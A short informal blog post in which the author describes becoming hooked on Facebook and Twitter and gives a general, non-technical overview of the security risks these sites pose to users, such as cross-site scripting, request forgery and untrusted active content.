The whipped cream is out of the can. Now what can we do about it?
Like so many millions of others, Ive found Facebook and Twitter in the last few months, in addition to the more traditional professional networking sites Ive used for years, like LinkedIn. But what started as idle curiosity soon grew into addiction.
Yes, my name is Ken and Im addicted to
But gosh darn it, theyre fun! Ive re-connected with many old friends, and I like knowing what theyve done with their lives. OK, were not likely to become best friends again, but I still value that connection weve made again.
So, how secure are these sites?
Ive experienced several classic Web security issues in each of the sites I frequent, and without a doubt there remain many vulnerabilities to be discovered. But that hasnt stopped me from using them.
Like any decision involving risk, Ive studied the issues, minimized my own exposure, and Im getting on with what I care to do.
Lets start by looking at the issues briefly.
And dont think for a moment that all web application vulnerabilities solely place the application at risk. Many also put the apps users at risk: cross-site scripting (XSS), cross-site request forgery (CSRF), and others can be used to attack the users quite easily.
As a user of a social networking site, youre placing your (and your employers) data at risk.
The bottom line: by allowing active content into your browser, you are trusting someone elses code to run on your computer safely. Well, whats the big deal? We do that all the time. Well, now the code is dynamic and maintained somewhere else, and youre trusting it every time. Gulp!
But your browser isnt so discerning. Some of the stuff that comes into it while youre on Facebook might be provided by someone else: another Facebook user; an attacker; a third party application on Facebook. If your browser trusts Facebook, chances are its also going to trust that code. This extends the active content exposure pretty substantially.